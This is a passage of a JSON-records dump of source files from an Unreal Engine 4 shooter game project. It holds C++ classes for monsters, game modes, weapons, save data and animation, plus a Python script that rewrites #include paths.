FRotator::ZeroRotator);\n//\tABCHECK(nullptr != NewWeapon, false);\n//\n//\tif (CurrentWeapon.IsValid(true))\n//\t\tUnEquipWeapon();\n//\n//\tFName MonsterGunSocket(TEXT(\"Bip001-L-GunSocket\"));\n//\tNewWeapon->AttachToComponent(Owner->GetMesh(), FAttachmentTransformRules::SnapToTargetNotIncludingScale, MonsterGunSocket);\n//\tNewWeapon->SetOwner(Owner);\n//\n//\tCurrentWeapon = NewWeapon;\n//\tCurrentWeapon->SetWeaponData(nWeaponTalbeIndex)\n//\treturn true;\n//}\n\nvoid UPG_ComponentWeapon::UnEquipWeapon()\n{\n\tif (CurrentWeapon.IsValid(true))\n\t{\n\t\tCurrentWeapon->DetachFromActor(FDetachmentTransformRules::KeepWorldTransform);\n\t\tCurrentWeapon->Destroy();\n\t\tCurrentWeapon = nullptr;\n\t}\n}\n\n bool UPG_ComponentWeapon::IsEquipWeapon()\n{\n\t return CurrentWeapon.IsValid(true);\n}\n\nvoid UPG_ComponentWeapon::Fire()\n{\n\tABCHECK(CurrentWeapon.Get());\n\tCurrentWeapon->Fire();\n}\n\nvoid UPG_ComponentWeapon::StopFire()\n{\n\tABCHECK(CurrentWeapon.IsValid(true));\n\tCurrentWeapon->StopFire();\n}\n\nfloat UPG_ComponentWeapon::GetAttackRange()\n{\n\treturn CurrentWeapon.IsValid(true) ? CurrentWeapon->GetAttackRange() : 0.0f;\n}\n\nvoid UPG_ComponentWeapon::OnDestroy()\n{\n\tUnEquipWeapon();\n}" }, { "alpha_fraction": 0.7542372941970825, "alphanum_fraction": 0.7542372941970825, "avg_line_length": 20.071428298950195, "blob_id": "ef2ee185f1d566b5529ac76b99dc51126bbfcdb9", "content_id": "bf65223380b28a921a09992a5749669736d52718", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 592, "license_type": "no_license", "max_line_length": 104, "num_lines": 28, "path": "/Source/Project_Gun/Public/Character/PG_MonCharBoss.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n#include \"Character/PG_MonChar.h\"\n\n#include \"PG_MonCharBoss.generated.h\"\n\n/**\n * \n */\nUCLASS()\nclass PROJECT_GUN_API APG_MonCharBoss : public APG_MonChar\n{\n\tGENERATED_BODY()\n\t\npublic :\n\tAPG_MonCharBoss();\n\n\tvirtual void BeginPlay() override;\n\tvirtual void PostInitializeComponents() override;\n\nprivate:\n\tUPROPERTY(EditAnywhere, BlueprintReadWrite, Category = MonsterInfo, Meta = (AllowPrivateAccess = true))\n\tstruct FPGMonsterData_Boss MonsterBossData;\n\t\n};\n" }, { "alpha_fraction": 0.6900982856750488, "alphanum_fraction": 0.694633424282074, "avg_line_length": 29.06818199157715, "blob_id": "9fb0428b95cbbe65ffea47d3610de2f9ec57f112", "content_id": "c47d6888be9c5674d05332cd9ca1f709a11cf287", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2792, "license_type": "no_license", "max_line_length": 187, "num_lines": 88, "path": "/Source/Project_Gun/Public/Character/PG_MonChar.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n#include \"Character/PG_Char.h\"\n\n#include <GameFramework/Character.h>\n#include \"PG_MonChar.generated.h\"\n\nUCLASS()\nclass PROJECT_GUN_API APG_MonChar : public APG_Char\n{\n\tGENERATED_BODY()\n\npublic:\n\t// Sets default values for this character's properties\n\tAPG_MonChar();\n\nprotected:\n\t// Called when the game starts or when spawned\n\tvirtual void BeginPlay() override;\n\tvirtual void PostInitializeComponents() override;\n\tvirtual void FellOutOfWorld(const class UDamageType & dmgType) override;\n\npublic:\t\n\t// Called every frame\n\tvirtual void Tick(float DeltaTime) override;\n\n\t// Called to bind functionality to input\n\tvirtual void SetupPlayerInputComponent(class UInputComponent* PlayerInputComponent) override;\n\npublic :\n\t//==========================================================\n\t// AI\n\t//==========================================================\n\tbool RunAI();\n\tvoid StopAI();\n\n\t//==========================================================\n\t// Monster Info\n\t//==========================================================\n\tconst FPGMonsterData* GetMonsterData();\n\tvoid SetHP(int32 nHP);\n\tvoid SetDie(bool IsUseLetharAttack);\n\tint32 GetDetectRange() const;\t\t// 몬스터 시야\n\tint32 GetChaseRange() const;\t\t// 몬스터가 쫓아오는 최대 거리\n\tfloat GetHPRatio() const;\t\t\t// 현재 체력 비율\n\tfloat GetMaxHP() const;\t\t\t\t// 최대 체력\n\tfloat GetDropRate() const;\t\t\t// 재화 드랍확율\n\n\nprotected :\n\tvirtual bool SetDefaultMonsterData();\n\tclass APG_MyChar* FindTargetToMyChar();\t// 몬스터 기준에서 타겟팅할 플레이어를 찾는다.\n\n\tvoid UpdateRotation(float DeltaTime);\n\npublic :\n\tvirtual bool OnDamage(int32 nDamage, bool IsUseLetharAttack = false);\n\nprotected :\n\tvirtual void OnAssetLoadCharacterCompleted() override;\n\tUFUNCTION()\n\tvirtual void OnCharacterHit(UPrimitiveComponent* OverlappedComp, AActor* OtherActor, UPrimitiveComponent* OtherComp, int32 OtherBodyIndex, bool bFromWeep, const FHitResult& SweepResult);\n\tUFUNCTION()\n\tvirtual void OnHitCallback(UPrimitiveComponent* HitComp, AActor* OtherActor, UPrimitiveComponent* OtherComp, FVector NormalImpulse, const FHitResult& Hit);\n\t\nprotected:\n\tUPROPERTY(VisibleInstanceOnly, Category = MonsterComponent)\n\tclass UPG_ComponentCharScale* CharScaleComponent;\n\n\tUPROPERTY()\n\tclass APG_AICon_Mon* AIController;\n\n\tstruct FPGMonsterData* MonsterData = nullptr;\n\nprotected:\n\tbool\t\tm_bDoNotRotation = false;\t\t// 몬스터가 회전하지 않음\n\tbool\t\tm_bDoNotMoving = false;\t\t\t// 몬스터가 이동하지 않음\n\tfloat\t\tm_fCharTargetAngle = 0.0f;\n\tfloat\t\tm_fMaxHP;\n\tFRotator\tm_vTargetRotation = FRotator::ZeroRotator;\n\tFVector\t\tm_vBeginScale;\n\t\nprivate :\n\tvoid DebugOnly();\n};\n" }, { "alpha_fraction": 0.5982532501220703, "alphanum_fraction": 0.6077575087547302, "avg_line_length": 32.8521728515625, "blob_id": "37fc05f90e5d474ac50d9e01d73d4ac697fde54a", "content_id": "3976ac255f80ece519aaf43e8769ff6783cc848b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4161, "license_type": "no_license", "max_line_length": 127, "num_lines": 115, "path": "/Source/Project_Gun/Public/Game/GameMode/PG_GameModeBase.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n\n#include <GameFramework/GameModeBase.h>\n#include \"PG_GameModeBase.generated.h\"\n\nextern UWorld* G_PGWorld = nullptr;\n/**\n * \n */\nUCLASS()\nclass PROJECT_GUN_API APG_GameModeBase : public AGameModeBase\n{\n\tGENERATED_BODY()\n\t\npublic :\n\tAPG_GameModeBase();\n\tvirtual void PostLoad() override;\n\tvirtual void PostInitializeComponents() override;\n\tvirtual void PostLogin(APlayerController* NewPlayer) override;\n\tvirtual void BeginPlay() override;\n\tvirtual void BeginDestroy() override;\n\tvirtual void Tick(float DeltaTime) override;\n\t\npublic :\n\t//===================================================\n\t// Game\n\t//===================================================\n\tUFUNCTION(BlueprintCallable, Category = \"PG Game\")\n\tbool StartGame();\n\tUFUNCTION(BlueprintCallable, Category = \"PG Game\")\n\tvoid StartGame_NextStage();\n\tUFUNCTION(BlueprintCallable, Category = \"PG Game\")\n\tvoid RestartGame();\n\n\t//===================================================\n\t// Stage\n\t//===================================================\n\t// StageID 관련\n\tUFUNCTION(BlueprintCallable, Category = \"PG Stage\")\n\tbool SetNextStageID();\n\tUFUNCTION(BlueprintCallable, Category = \"PG Stage\")\n\tbool SetPrevStageID();\n\tUFUNCTION(BlueprintCallable, Category = \"PG Stage\")\n\tbool SetPlayStageID(int32 nPlayStageID);\n\tUFUNCTION(BlueprintCallable, Category = \"PG Stage\")\n\tint32 GetPlayStageID() { return m_nPalyStageID; }\n\n\t// SaveStageData\n\tUFUNCTION(BlueprintCallable, Category = \"PG Stage\")\n\tbool SetSelectSaveStageData(int32 a_nStageID);\t\t// m_pSelectSaveStageData 데이터를 설정한다.\n\tUFUNCTION(BlueprintCallable, Category = \"PG Stage\")\n\tbool IsFirstPlayStage(int32 a_nStageID);\t\t\t// 해당 스테이지를 처음 플레이하는지 검사한다.\n\n\t//===================================================\n\t// Mission\n\t//===================================================\n\tvirtual bool IsClearMission(EStageClearType a_ekStageClearType) { return false; }\t// 각각의 GameMode에 따라 IsClearMission 검사 조건이 틀림\n\n\t//===================================================\n\t// WeaponShop\n\t//===================================================\n\t// 무기 언락\n\tbool IsUnlockWeapon(int32 a_nWeaponIndex);\n\tbool IsMaxLevelPower(int32 a_nWeaponIndex);\n\tbool IsMaxLevelAmmo(int32 a_nWeaponIndex);\n\tbool IsAbleBuyRewardPointPower(int32 a_nWeaponIndex);\n\tbool IsAbleBuyRewardPointAmmo(int32 a_nWeaponIndex);\n\n\t// 무기 구매\n\tbool BuyWeapon(int32 a_nWeaponIndex);\n\tbool BuyPowerUp(int32 a_nWeaponIndex);\n\tbool BuyAmmoUp(int32 a_nWeaponIndex);\n\tFString GetLastBuyErrorMsg();\n\n\t// 무기 정보\n\tint32 GetMaxPower(int32 a_nWeaponIndex);\n\tint32 GetMaxAmmo(int32 a_nWeaponIndex);\n\n\t//===================================================\n\t// Save Data\n\t//===================================================\n\tclass UPG_SavePlayerData*\tGetSavePlayerData()\t\t\t{ return m_pSavePlayerData; }\n\tclass UPG_SaveStageData*\tGetSelectedSaveStageData()\t{ return m_pSelectSaveStageData; }\n\t// 저장\n\tvirtual bool SavePlayerData();\t\t// m_pSavePlayerData에 쓰여진 플레이어 데이터를 저장한다\n\tvirtual bool SaveStageData();\t\t// m_pSelectSaveStageData에 쓰여진 스테이지 플레이 데이터를 저장한다\n\nprivate:\n\t//==========================================================\n\t// SavePlayerData (플레이어 저장 데이터)\n\t//==========================================================\n\tclass UPG_SavePlayerData*\tLoadSavePlayerData();\n\n\t//==========================================================\n\t// SaveStageData (스테이지 저장 데이터)\n\t//==========================================================\n\tclass UPG_SaveStageData*\tLoadSaveStageData(int32 nStageID);\n\nprivate:\n\tvoid UpdateGameInstance(float DeltaTime);\n\nprotected :\n\tUPROPERTY()\n\tclass UPG_SavePlayerData*\tm_pSavePlayerData = nullptr;\t\t\t// 저장된 유저 데이터\n\tUPROPERTY()\n\tclass UPG_SaveStageData*\tm_pSelectSaveStageData = nullptr;\t\t// 저장된 스테이지 데이터\n\tUPROPERTY()\n\tFString m_kLastBuyErrorMsg;\n\tUPROPERTY()\n\tint32 m_nPalyStageID = 0;\t// 현재 스테이지ID\n};\n" }, { "alpha_fraction": 0.718324601650238, "alphanum_fraction": 0.7204188704490662, "avg_line_length": 19.340425491333008, "blob_id": "d9c0dad5fc72a10542532ce16c063408d5ef659a", "content_id": "cb319b0f53a49f6f77fa0e95d64514a61777fb2f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 957, "license_type": "no_license", "max_line_length": 79, "num_lines": 47, "path": "/Source/Project_Gun/Private/Game/Console/Commands/PG_CommandRestartStage.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n#include \"Game/Console/Commands/PG_CommandRestartStage.h\"\n#include \"Game/GameMode/PG_GameModeStage.h\"\n\nPG_CommandRestartStage::PG_CommandRestartStage()\n{\n}\n\nPG_CommandRestartStage::~PG_CommandRestartStage()\n{\n}\n\nvoid PG_CommandRestartStage::UpdateCommand()\n{\n\tif (bOnCommand)\n\t{\n\t\tbOnCommand = false;\n\t\tExcute();\n\t}\n}\n\nvoid PG_CommandRestartStage::Excute()\n{\n\tABCHECK(nullptr != G_PGWorld);\n\tABCHECK(nullptr != m_pConsoleVariable);\n\n\tif (1 != m_pConsoleVariable->GetInt())\n\t{\n\t\tABLOG(Warning, TEXT(\"To use this command, enter a value of 1.\"));\n\t\treturn;\n\t}\n\n\tauto pGameMdoe = Cast<APG_GameModeStage>(G_PGWorld->GetAuthGameMode());\n\tif (nullptr == pGameMdoe)\n\t{\n\t\tABLOG(Warning, TEXT(\"Can only be used in stage play.\"));\n\t\treturn;\n\t}\n\n\tpGameMdoe->RestartGame();\n}\n\nvoid PG_CommandRestartStage::OnChangeCommand()\n{\n\tABCHECK(nullptr != m_pConsoleVariable);\n\tbOnCommand = true;\n}" }, { "alpha_fraction": 0.6726045608520508, "alphanum_fraction": 0.6761672496795654, "avg_line_length": 32.12422180175781, "blob_id": "a1d034edd728e5c69bf3f146022d8a757064b9d8", "content_id": "db75919d37741ad3332fd82248d3eca4467768a1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5333, "license_type": "no_license", "max_line_length": 131, "num_lines": 161, "path": "/fixup-include-paths.py", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nimport os, sys\nimport re\n\nproject_path = \"C:/Project_Gun\"\nengine_path = \"C:/Program Files/Epic Games/UE_4.25/Engine\"\n\nresponse = input(\"\"\"This script will analyze all project source files (includng plugins), searching for #include directives to fix:\n - old one-file #include paths will be replaced by long paths, as requested by the 4.24 new default build settings\n - include style for engine includes (<,>) and project includes (\\\",\\\") will be enforced\n\nThe paths used for the analysis are:\n Engine: \"\"\" + engine_path + \"\"\"\n Project: \"\"\" + project_path + \"\"\"\n\nIf you want to change these paths, edit the source code of this script.\n\nStart with the analysis? (y/n)\"\"\")\n\nif(response != \"y\") : exit(0)\n\ndef ExtractIncludePaths(basepath, localpath=\"\", computed_map={}, excluded_folders=[]):\t\n\tdirs = os.listdir( basepath + \"/\" + localpath)\n\tfor file in dirs:\n\t\tcurrlocalpath = localpath + \"/\" + file\n\t\tcurrpath = basepath + \"/\" + currlocalpath\n\t\t\n\t\tif(os.path.isdir(currpath)) : \n\t\t\tif(not (\"\" + file) in excluded_folders) : ExtractIncludePaths(basepath, currlocalpath, computed_map, excluded_folders)\n\t\telse:\n\t\t\t(name, ext) = os.path.splitext(file)\n\t\t\t\n\t\t\tif(ext==\".h\"):\n\t\t\t\tcomputed_map[file] = currlocalpath\t\t\t\t\n\n\treturn computed_map\n\ndef PrintIncludePaths(include_paths):\n\tfor key in include_paths:\n\t\tprint(key + \" -> \" + include_paths[key])\n\ndef MinimizePath(path):\n\tif(path.startswith('/')): path = path[1:] # strip first slash\n\t\n\tsearches = [\"Public\", \"Private\", \"Classes\", \"Source\"]\n\n\tbackup = path\n\tfor search in searches:\n\t\tpath = backup.split(\"/\")\n\t\tfound = False\n\t\twhile True: # removing all path folders until Public/ (included)\n\t\t\ttmp = path[0]\n\t\t\tpath.remove(tmp)\n\n\t\t\tif(tmp == search): \n\t\t\t\tfound = True\n\t\t\t\tbreak\n\n\t\t\tif(len(path) == 0) : break\n\n\t\tif(found) : break\n\n\treturn \"/\".join(path) if len(path) > 0 else backup\n\ndef FixInclude(include, source_local_path, project_includes = {}, engine_includes={}, engine_plugins_includes={}):\n\tinclude_path = \"\"\n\n\tx = re.search(\"\\\"(.+)\\\"\", include)\n\tif(not x is None):\n\t\tinclude_path = x.groups()[0]\n\telse:\n\t\tx = re.search(\"<(.+)>\", include)\n\t\tif(not x is None):\n\t\t\tinclude_path = x.groups()[0]\n\n\tif(include_path == \"\") : return include\n\n\t# take the last part of the include path\n\ttmp = include_path.split(\"/\")\n\tinclude_filename = tmp[len(tmp)-1]\n\n\tcomplete_path = \"\"\n\tinclude_style = ['\"', '\"']\n\n\tif(include_filename in project_includes): # project\n\t\tcomplete_path = project_includes[include_filename]\n\telif(include_filename in engine_includes): # engine\n\t\tcomplete_path = engine_includes[include_filename]\n\t\tinclude_style = ['<', '>']\n\telif(include_filename in engine_plugins_includes): #engine plugins\n\t\tcomplete_path = engine_plugins_includes[include_filename]\n\t\tinclude_style = ['<', '>']\n\n\tif(complete_path != \"\"):\n\t\tif(complete_path.find(include_path) != -1):\n\t\t\treturn '#include ' + include_style[0] + MinimizePath(complete_path) + include_style[1] + '\\n'\n\t\n\treturn include\n\ndef FixFile(basepath, localpath, filename, project_includes = {}, engine_includes={}, engine_plugins_includes={}):\n\tprint(\"Fixing: \" + basepath + \"/\" + localpath + \"...\")\n\n\tfixed_content = \"\"\n\n\twith open(basepath + \"/\" + localpath, \"r\") as f:\n\t\tlines = f.readlines()\n\n\t\tfor line in lines:\n\t\t\tx = re.search(\"^\\s*#include \", line)\n\n\t\t\tif(not x is None) :\n\t\t\t\tfixed_content = fixed_content + FixInclude(line, localpath, project_includes, engine_includes, engine_plugins_includes)\n\t\t\telse:\n\t\t\t\tfixed_content = fixed_content + line\n\n\tf = open(basepath + \"/\" + localpath, \"w\")\n\tf.write(fixed_content)\n\tf.close()\n\n\t#exit(0)\n\ndef FixFiles(basepath, localpath=\"\", project_includes = {}, engine_includes={}, engine_plugins_includes={}):\n\tdirs = os.listdir( basepath + \"/\" + localpath)\n\tfor file in dirs:\n\t\tcurrlocalpath = localpath + \"/\" + file if localpath != \"\" else file\n\t\tcurrpath = basepath + \"/\" + currlocalpath\n\t\t\n\t\tif(os.path.isdir(currpath)) : \t\t\t\n\t\t\tFixFiles(basepath, currlocalpath, project_includes, engine_includes, engine_plugins_includes)\n\t\telse:\n\t\t\t(name, ext) = os.path.splitext(file)\n\t\t\t\n\t\t\tif((ext==\".h\" or ext==\".cpp\") and file != \"RzChromaSDKTypes.h\"): #avoid RzChromaSDKTypes.h cause it contains non utf8 characters\n\t\t\t\tFixFile(basepath, currlocalpath, file, project_includes, engine_includes, engine_plugins_includes)\n\nproject_include_paths = {}\nExtractIncludePaths(project_path + \"/Source\", \"\", project_include_paths)\n\nengine_include_paths = {}\nExtractIncludePaths(engine_path + \"/Source\", \"\", engine_include_paths, [\"ThirdParty\", \"Private\"])\n\nengine_plugins_include_paths = {}\nExtractIncludePaths(engine_path + \"/Plugins\", \"\", engine_plugins_include_paths, [\"ThirdParty\", \"Private\"]) \n\nFixFiles(project_path + \"/Source\", \"\", project_include_paths, engine_include_paths, engine_plugins_include_paths)\n\ndirs = os.listdir( project_path + \"/Plugins\")\nfor file in dirs:\n\tprint(file)\n\t\n\tsrc_path = project_path + \"/Plugins/\" + file + \"/Source\"\n\n\tif(os.path.isdir(src_path)) :\n\t\tplugin_include_paths = {}\n\t\tExtractIncludePaths(src_path, \"\", plugin_include_paths)\n\n\t\tFixFiles(src_path, \"\", plugin_include_paths, engine_include_paths, engine_plugins_include_paths)\n\telse:\n\t\tprint(project_path + \"/Plugins/\" + file + \" is not a directory or doesn't contain any /Source subfolder, skipping\" +\n\t\t\t\" (if it's not a binary plugin folder maybe you don't need it anymore?)\")\n" }, { "alpha_fraction": 0.5674778819084167, "alphanum_fraction": 0.5719026327133179, "avg_line_length": 25.58823585510254, "blob_id": "4008d6fcedd9081e79015011f15dbeda2fd44b5d", "content_id": "d3a8a0f350b6ea9bd73dbcce84c648887c089419", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 956, "license_type": "no_license", "max_line_length": 109, "num_lines": 34, "path": "/Source/Project_Gun/Public/Game/GameMode/PG_GameModeMainLobby.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n#include \"Game/GameMode/PG_GameModeBase.h\"\n\n#include <GameFramework/GameModeBase.h>\n#include \"PG_GameModeMainLobby.generated.h\"\n\n/**\n * \n */\nUCLASS()\nclass PROJECT_GUN_API APG_GameModeMainLobby : public APG_GameModeBase\n{\n\tGENERATED_BODY()\n\t\npublic :\n\tAPG_GameModeMainLobby();\n\n\tvirtual void BeginPlay() override;\n\t\npublic :\n\t//===================================================\n\t// Mission\n\t//===================================================\n\tvirtual bool IsClearMission(enum EStageClearType a_ekStageClearType) override;\t// MainLobby에서 사용하는 미션 클리어 검사\n\n\t//===================================================\n\t// WeaponSlot\n\t//===================================================\n\tvoid SaveWeaponEquipSlot(int32 nSlotIndex, int32 nWeaponIndex);\t\t// 무기를 장착 정보를 저장한다.\n};\n" }, { "alpha_fraction": 0.5755265355110168, "alphanum_fraction": 0.5766158103942871, "avg_line_length": 48.17856979370117, "blob_id": "b2c2d3414471e3240e550da22845f9e2a4ce9de4", "content_id": "4cf95ed9dd590d30060f660fa88ccea67e512558", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 2872, "license_type": "no_license", "max_line_length": 154, "num_lines": 56, "path": "/Source/Project_Gun/Project_Gun.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n#include <Engine.h>\n#include <Kismet/KismetMathLibrary.h>\n\n#define TEST_CODE\n\nDECLARE_LOG_CATEGORY_EXTERN(Project_Gun, Log, All);\n#define ABLOG_CALLINFO\t\t\t\t\t(FString(__FUNCTION__) + TEXT(\"(\") + FString::FromInt(__LINE__) + TEXT(\")\"))\n#define ABLOG_S(Verbosity)\t\t\t\tUE_LOG(Project_Gun, Verbosity, TEXT(\"%s\"), *ABLOG_CALLINFO)\n#define ABLOG(Verbosity, Format, ...)\tUE_LOG(Project_Gun, Verbosity, TEXT(\"%s %s\"), *ABLOG_CALLINFO, *FString::Printf(Format, ##__VA_ARGS__))\n\n#define ABCHECK(Expr, ...)\t\t\t\t{ if(!(Expr)) { ABLOG(Error, TEXT(\"ASSERTION : %s\"), TEXT(\"'\"#Expr\"'\")); return __VA_ARGS__; }}\n\n//#define SAFE_DESTROY(pUObject)\t\\\n//{ \\\n//\tUObject* pObjectDestroy = Cast<UObject>(pUObject);\t\\\n//\tif (pObjectDestroy && pObjectDestroy->IsValidLowLevel()) \\\n//\t{\t\\\n//\t\tpObjectDestroy->ConditionalBeginDestroy();\t\t\\\n//\t\tpObjectDestroy = nullptr;\t\t\t\t\t\t\\\n//\t}\t\\\n//\telse \\\n//\t{ \\\n//\t\tABLOG(Error, TEXT(\"UObject Safe Destroy failed\"));\\\n//\t} \\\n//} \\\n\n//==============================================================================================================================\n// Widget Macros\n//==============================================================================================================================\n// 위젯 선언 (Widget 관련 class 내 위젯 선언시 사용합니다.)\n#define PG_WIDGET_DECLAR(WIDGET_TYPE, WIDGET_NAME, ...)\t\t\tUPROPERTY(##__VA_ARGS__) class WIDGET_TYPE* m_pk##WIDGET_NAME = nullptr\n#define PG_WIDGET_DECLAR_TArray(WIDGET_TYPE, WIDGET_NAME, ...)\tUPROPERTY(##__VA_ARGS__) TArray<class WIDGET_TYPE*> m_pk##WIDGET_NAME\n\n// 위젯 연결 (PG_WIDGET_DECLAR으로 선언한 Widget과 연결하기 위해 NativeConstruct 함수에서 사용합니다.)\n#define PG_WIDGET_LINK(WIDGET_TYPE, WIDGET_NAME) \\\n\tm_pk##WIDGET_NAME = Cast<WIDGET_TYPE>(GetWidgetFromName(TEXT(#WIDGET_NAME))); \\\n\tif (nullptr == m_pk##WIDGET_NAME) { ABLOG(Error, TEXT(\"\\\"<\"#WIDGET_TYPE\"> \"#WIDGET_NAME \"\\\" Unable to connect to the widget.\")); }\t\\\n\n// TArray 타입으로 선언된 변수에 Widget에 연결합니다.\n#define PG_WIDGET_LINK_TArray(WIDGET_TYPE, WIDGET_NAME, MAX_SIZE) \\\n\tm_pk##WIDGET_NAME.Init(nullptr, MAX_SIZE);\t\\\n\tfor (int32 nIndex = 0; nIndex < MAX_SIZE; ++nIndex) { \\\n\t\tFString GetWidgetName = FString::Printf(TEXT(#WIDGET_NAME\"_%d\"), nIndex); \\\n\t\tm_pk##WIDGET_NAME[nIndex] = Cast<WIDGET_TYPE>(GetWidgetFromName(*GetWidgetName)); \\\n\t\tif (nullptr == m_pk##WIDGET_NAME[nIndex]) { ABLOG(Error, TEXT(\"\\\"<\"#WIDGET_TYPE\"> %s Unable to connect to the widget.\"), *GetWidgetName); continue; }\t\\\n\t} \\\n\n// End Widget Macros\n//==============================================================================================================================\n\n#include \"Define/PG_DefineDelegate.h\"\n#include \"Define/PG_TableData.h\"\n#include \"Define/PG_GamePlayData.h\"\n" }, { "alpha_fraction": 0.7509986758232117, "alphanum_fraction": 0.7616511583328247, "avg_line_length": 22.5, "blob_id": "f496b48e251b9edfd100f9a9efdfc5bb16974a44", "content_id": "e7d257be9e070764bd63567a995e71a73ff402a3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 761, "license_type": "no_license", "max_line_length": 134, "num_lines": 32, "path": "/Source/Project_Gun/Private/SaveData/PG_SavePlayerData.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"SaveData/PG_SavePlayerData.h\"\n\n\n\nUPG_SavePlayerData::UPG_SavePlayerData()\n{\n\tm_nLastPlayStageID = 0;\n\tm_nRewardPoint = 0;\n\tm_bExtendWeaponSlot = false;\n\t//m_nEquipWeaponSlotIndex = 0;\n\t//m_kEquipWeaponClass = LoadClass<APG_Weapon>(NULL, TEXT(\"Blueprint'/Game/PG/Blueprints/Weapon/BP_Weapon_Rifle.BP_Weapon_Rifle_C'\"));\n\n\tm_kEquipWeaponTableIndex.Init(0, PG_MAX_WEAPON_SLOT);\n\n\t// 기본 무기 Unlock\n\tFPGWeaponOwnData kDefalutWeaponOwnData;\n\tkDefalutWeaponOwnData.IsUnlock = true;\n\tWeaponOwnData.Add(0, kDefalutWeaponOwnData);\n}\n\n\nFString UPG_SavePlayerData::GetSlotName()\n{\n\treturn TEXT(\"PlayerSaveData\");\n}\n\nint32 UPG_SavePlayerData::GetPlayerIndex()\n{\n\treturn 0;\n}" }, { "alpha_fraction": 0.7355555295944214, "alphanum_fraction": 0.7450000047683716, "avg_line_length": 22.363636016845703, "blob_id": "2f3e02d2b10aea48ad5fe9c7d0b9f291228f7653", "content_id": "3323f499a4098413f98e56e92a5898b4834abc45", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1802, "license_type": "no_license", "max_line_length": 95, "num_lines": 77, "path": "/Source/Project_Gun/Private/Anim/PG_AnimIns_MyChar.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"Anim/PG_AnimIns_MyChar.h\"\n#include \"Character/PG_MyChar.h\"\n#include \"Character/PG_MonChar.h\"\n\n#include <DrawDebugHelpers.h>\n\nUPG_AnimIns_MyChar::UPG_AnimIns_MyChar()\n{\n\tCurrentPawnSpeed = 0.0f;\n\tCurrentPawnSpeedRatio = 0.0f;\n\tfAimYaw = 0.0f;\n\tfAimPitch = 0.0f;\n\tTargetMonster = nullptr;\n}\n\nvoid UPG_AnimIns_MyChar::NativeUpdateAnimation(float DeletaSeconds)\n{\n\tSuper::NativeUpdateAnimation(DeletaSeconds);\n\n\tauto Pawn = Cast<APG_MyChar>(TryGetPawnOwner());\n\tif (Pawn)\n\t{\n\t\tCurrentPawnSpeed = Pawn->GetVelocity().Size();\n\n\t\tif (CurrentPawnSpeed > 0.0f)\n\t\t\tCurrentPawnSpeedRatio = CurrentPawnSpeed / Pawn->GetMaxSpeed();\n\t\telse\n\t\t\tCurrentPawnSpeedRatio = 0.0f;\n\t}\n}\n\nvoid UPG_AnimIns_MyChar::SetRotation(float fYaw)\n{\n\tfAimYaw = fYaw;\n\tfAimPitch = fYaw;\n}\n\nvoid UPG_AnimIns_MyChar::SetMontageFireReaction(UAnimMontage* AnimMontage)\n{\n\tABCHECK(nullptr != AnimMontage);\n\tMontageFireReaction = AnimMontage;\n}\n\nbool UPG_AnimIns_MyChar::IsVaildTargetMonster()\n{\n\treturn TargetMonster ? true : false;\n}\n\nbool UPG_AnimIns_MyChar::IsAimingComplete()\n{\n\tABCHECK(nullptr != MontageFireReaction, false);\n\n\tFAnimMontageInstance* pAnimMontageInstance = GetActiveInstanceForMontage(MontageFireReaction);\n\tif (pAnimMontageInstance && pAnimMontageInstance->bPlaying)\n\t{\n\t\tfloat fBlendTime = pAnimMontageInstance->GetWeight();\n\t\t//FString DebugMsg = FString::Printf(TEXT(\"BlendTime : %f\"), fBlendTime);\n\t\t//GEngine->AddOnScreenDebugMessage(-1, 1.0f, FColor::Yellow, DebugMsg);\n\n\t\treturn (0.9f <= fBlendTime);\n\t}\n\n\treturn false;\n}\n\nvoid UPG_AnimIns_MyChar::OnTargetMonster(APG_MonChar* pTarget)\n{\n\tTargetMonster = pTarget;\n}\n\nvoid UPG_AnimIns_MyChar::AnimNotify_Fire()\n{\n\t//ABLOG(Warning, TEXT(\"Fire!\"));\n\tOnFire.Broadcast();\n}\n\n" }, { "alpha_fraction": 0.7936046719551086, "alphanum_fraction": 0.7965116500854492, "avg_line_length": 31.761905670166016, "blob_id": "b107be44258236b7b1677cc374dc54d869328743", "content_id": "e4e24c3c654eb9c70583fdf1cc728c6c16d5872e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1402, "license_type": "no_license", "max_line_length": 202, "num_lines": 42, "path": 